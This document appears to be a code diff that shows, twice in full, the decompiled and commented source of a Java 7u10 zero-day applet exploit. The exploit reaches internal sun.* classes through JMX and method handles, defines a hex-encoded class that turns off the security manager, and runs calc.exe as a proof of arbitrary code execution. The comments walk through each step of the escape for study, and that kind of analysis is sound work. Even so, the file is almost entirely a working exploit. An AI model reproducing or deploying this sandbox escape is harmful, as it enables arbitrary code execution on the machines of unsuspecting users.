argusdusty · December 10, 2015 22:59
diff --git a/ExploitNotes.java b/ExploitNotes.java
 /*
 Java 0day 1.7.0_10 decrypted source
 Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
 From Russia with love.
 */

 import java.applet.Applet;
 import com.sun.jmx.mbeanserver.JmxMBeanServer;
 import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
 import com.sun.jmx.mbeanserver.MBeanInstantiator;
 import java.lang.invoke.MethodHandle;
 import java.lang.invoke.MethodHandles;
 import java.lang.invoke.MethodType;
 import java.lang.reflect.Method;

 public byte[] hex2Byte(String paramString) {
 	byte[] arrayOfByte = new byte[paramString.length() / 2];
 	for (int i = 0; i < arrayOfByte.length; i++) {
 		arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
 	}
 	return arrayOfByte;
 }

 // Decompiles to:
 /*
 import java.security.AccessController;
 import java.security.PrivilegedExceptionAction;

 public class B implements PrivilegedExceptionAction {
 	public B() {
 		try {
 			AccessController.doPrivileged(this);
 		}
 		catch(Exception e) { }
 	}

 	public Object run() {
 		System.setSecurityManager(null);
 		return new Object();
 	}
 }
 // This basically removes the security manager (System.setSecurityManager(null)), allowing arbitrary code execution.
 */
 // Decompilation credit to benmmurphy
 // http://www.reddit.com/r/netsec/comments/16b4n1/0day_exploit_fo_java_17u10_spotted_in_the_wild/c7ulpd7
 public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017";

 public void init() {
 	try {
 		// Convert above hex string to byte array.
 		byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);

 		// MBean creator to load the sun. classes
 		JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
 		JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
 		MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();

 		// Looks like this loads some normally inaccessable libraries.
 		// Can't find any good documentation on these two, so I'm not sure what they do.
 		ClassLoader a = null;
 		Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
 		Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);

 		// "Returns a lookup object which is trusted minimally.
 		// It can only be used to create method handles to publicly accessible fields and methods."
 		MethodHandles.Lookup localLookup = MethodHandles.publicLookup();

 		// Convienience for MethodType.methodType(MethodHandle.class, new Class[] { Class.class, MethodType.class });
 		// Returns the type of a method which takes a Class and a MethodType as input and returns a MethodHandle as output.
 		MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });

 		// "A typed, directly executable reference to an underlying method"
 		// Named "findConstructor", Is under the MethodHandles.Lookup class, and has the method type localMethodType1 (as above)
 		// Basically a(n in)direct pointer to the findConstructor function in the MethodHandles.Lookup class
 		MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);

 		// Returns the type of a method which takes no input (void input) and returns no output
 		MethodType localMethodType2 = MethodType.methodType(Void.TYPE);

 		// Equivalent to localLookup.findConstructor(localClass1, localMethodType2)
 		// Basically a(n in)direct pointer to the constructor to the "sun.org.mozilla.javascript.internal.Context" class which has no input
 		MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });

 		// Returns a new object of the type "sun.org.mozilla.javascript.internal.Context" new Object[0] represents no input
 		Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);

 		// Method type which takes a Class, a String, and a MethodType, and returns a MethodHandle
 		MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });

 		// Basically a(n in)direct pointer to the findVirtual function in the MethodHandles.Lookup class
 		MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);

 		// Returns the methodType of something in the "sun.org.mozilla.javascript.internal.GeneratedClassLoader" class which returns a ClassLoader
 		MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);

 		// Equivalent to localLookup.findVirtual(localClass1, "createClassLoader", localMethodType4)
 		// Basically a(n in)direct pointer to the function "createClassLoader" in "sun.org.mozilla.javascript.internal.Context"
 		MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });

 		// Equivalent to localObject1.createClassLoader(null)
 		Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });

 		// Equivalent to localLookup.findVirtual(localClass2, "defineClass", localMethodType5)
 		// Basically a(n in)direct pointer to the function "defineClass" in "sun.org.mozilla.javascript.internal.GeneratedClassLoader"
 		MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
 		MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 });

 		// Equivalent to localObject2.defineClass(null, arrayOfByte);
 		Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });

 		// Creates a newInstance of localClass3.
 		// localClass3 represents the decompiled code of arrayOfByte, which executes a class which removes the secuity manager
 		localClass3.newInstance();

 		// Now you can execute arbitrary code
 		Runtime.getRuntime().exec("calc.exe");
 	}
 	catch (Throwable ex) { }
 }

 // My overall understanding:
 // 0. Load sun.org.mozilla.javascript.internal.Context and .GeneratedClassLoader through JmxMBeanServers
 // 1. Create a new instance of sun.org.mozilla.javascript.internal.Context(). Call it x
 // 2. Run y = x.createClassLoader(null), which is of the type sun.org.mozilla.javascript.internal.GeneratedClassLoader
 // 3. Run z = y.defineClass(null, arrayOfBytes)
 // 4. Run z.newInstance(), turning the security manager off.
 // 5. Profit
	/*
	Java 0day 1.7.0_10 decrypted source
	Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
	From Russia with love.
	*/

	import java.applet.Applet;
	import com.sun.jmx.mbeanserver.JmxMBeanServer;
	import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
	import com.sun.jmx.mbeanserver.MBeanInstantiator;
	import java.lang.invoke.MethodHandle;
	import java.lang.invoke.MethodHandles;
	import java.lang.invoke.MethodType;
	import java.lang.reflect.Method;

	public byte[] hex2Byte(String paramString) {
	byte[] arrayOfByte = new byte[paramString.length() / 2];
	for (int i = 0; i < arrayOfByte.length; i++) {
	arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
	}
	return arrayOfByte;
	}

	// Decompiles to:
	/*
	import java.security.AccessController;
	import java.security.PrivilegedExceptionAction;

	public class B implements PrivilegedExceptionAction {
	public B() {
	try {
	AccessController.doPrivileged(this);
	}
	catch(Exception e) { }
	}

	public Object run() {
	System.setSecurityManager(null);
	return new Object();
	}
	}
	// This basically removes the security manager (System.setSecurityManager(null)), allowing arbitrary code execution.
	*/
	// Decompilation credit to benmmurphy
	// http://www.reddit.com/r/netsec/comments/16b4n1/0day_exploit_fo_java_17u10_spotted_in_the_wild/c7ulpd7
	public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017";

	public void init() {
	try {
	// Convert above hex string to byte array.
	byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);

	// MBean creator to load the sun. classes
	JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
	JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
	MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();

	// Looks like this loads some normally inaccessable libraries.
	// Can't find any good documentation on these two, so I'm not sure what they do.
	ClassLoader a = null;
	Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
	Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);

	// "Returns a lookup object which is trusted minimally.
	// It can only be used to create method handles to publicly accessible fields and methods."
	MethodHandles.Lookup localLookup = MethodHandles.publicLookup();

	// Convienience for MethodType.methodType(MethodHandle.class, new Class[] { Class.class, MethodType.class });
	// Returns the type of a method which takes a Class and a MethodType as input and returns a MethodHandle as output.
	MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });

	// "A typed, directly executable reference to an underlying method"
	// Named "findConstructor", Is under the MethodHandles.Lookup class, and has the method type localMethodType1 (as above)
	// Basically a(n in)direct pointer to the findConstructor function in the MethodHandles.Lookup class
	MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);

	// Returns the type of a method which takes no input (void input) and returns no output
	MethodType localMethodType2 = MethodType.methodType(Void.TYPE);

	// Equivalent to localLookup.findConstructor(localClass1, localMethodType2)
	// Basically a(n in)direct pointer to the constructor to the "sun.org.mozilla.javascript.internal.Context" class which has no input
	MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });

	// Returns a new object of the type "sun.org.mozilla.javascript.internal.Context" new Object[0] represents no input
	Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);

	// Method type which takes a Class, a String, and a MethodType, and returns a MethodHandle
	MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });

	// Basically a(n in)direct pointer to the findVirtual function in the MethodHandles.Lookup class
	MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);

	// Returns the methodType of something in the "sun.org.mozilla.javascript.internal.GeneratedClassLoader" class which returns a ClassLoader
	MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);

	// Equivalent to localLookup.findVirtual(localClass1, "createClassLoader", localMethodType4)
	// Basically a(n in)direct pointer to the function "createClassLoader" in "sun.org.mozilla.javascript.internal.Context"
	MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });

	// Equivalent to localObject1.createClassLoader(null)
	Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });

	// Equivalent to localLookup.findVirtual(localClass2, "defineClass", localMethodType5)
	// Basically a(n in)direct pointer to the function "defineClass" in "sun.org.mozilla.javascript.internal.GeneratedClassLoader"
	MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
	MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 });

	// Equivalent to localObject2.defineClass(null, arrayOfByte);
	Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });

	// Creates a newInstance of localClass3.
	// localClass3 represents the decompiled code of arrayOfByte, which executes a class which removes the secuity manager
	localClass3.newInstance();

	// Now you can execute arbitrary code
	Runtime.getRuntime().exec("calc.exe");
	}
	catch (Throwable ex) { }
	}

	// My overall understanding:
	// 0. Load sun.org.mozilla.javascript.internal.Context and .GeneratedClassLoader through JmxMBeanServers
	// 1. Create a new instance of sun.org.mozilla.javascript.internal.Context(). Call it x
	// 2. Run y = x.createClassLoader(null), which is of the type sun.org.mozilla.javascript.internal.GeneratedClassLoader
	// 3. Run z = y.defineClass(null, arrayOfBytes)
	// 4. Run z.newInstance(), turning the security manager off.
	// 5. Profit